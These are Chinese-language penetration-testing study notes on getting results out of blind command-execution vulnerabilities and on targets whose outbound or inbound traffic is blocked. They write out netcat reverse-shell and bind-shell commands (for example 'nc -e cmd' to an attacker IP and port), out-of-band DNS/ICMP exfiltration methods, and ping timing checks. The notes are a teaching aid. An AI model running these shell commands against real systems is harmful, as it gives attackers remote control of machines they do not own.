知识点:
1、数据不回显原因和解决-带外延迟反弹写文件
2、数据不出网原因和解决-出入站策略正反向连接
一、演示案例-数据不回显-原因解决-反弹&带外&延迟&写文件
原因:代码层面函数调用问题,没有输出测试等
实战过程:
1、判断是不是数据不回显并且有漏洞
2、有这个漏洞如何把执行的数据获取到
解决:
1、反弹权限
前提:判定目标的操作系统
https://forum.ywhack.com/shell.php
https://cloud.tencent.com/developer/article/1906240
nc -e cmd 119.45.254.149 7777 //目标机器把自身的cmd转发到119.45.254.149 7777端口上
nc -lvp 7777 //119.45.254.149服务器监听本地7777端口即可获取目标机器的shell
2、数据带外
DNSlog
TCP-Portlog
ICMP-Sizelog
3、延迟判断
发包看回显时间
Win:ping -n 6 127.0.0.1
Linux:ping -c 6 127.0.0.1
4、写访问文件
写静态文件或写入可访问的文件确定
5、其他:根据环境
文件下载、ping、curl等
https://forum.ywhack.com/bountytips.php?download
二、演示案例-数据不出网-原因解决-正反连接&出入站策略&隧道
环境:Windows外网靶机 Linux外网攻击机
流程:
1、判断出入限制的端口和协议
2、分析原因用正向还是反向还是隧道
原因:主机或应用防火墙出站限制
解决:利用NC反弹实验
实验:相对于靶机角度
1、正向连接
开启出站策略,采用正向连接
正向连接:本地监听等待对方连接
一、靶机绑定CMD到本地21端口(只要端口没被占用就行)
nc -e cmd -lvvp 21
二、攻击机主动连接靶机的21端口
nc 118.195.140.161 21
2、反向连接
开启入站策略,采用反向连接
反向连接:主动给出去,对方监听
一、靶机绑定CMD到攻击机的1111端口
nc -e cmd 119.45.254.149 1111
二、攻击机等待1111连接
nc -lvvp 1111
3、隧道技术
开启出站策略,采用其他协议隧道
ICMP,DNS等隧道技术来进行通讯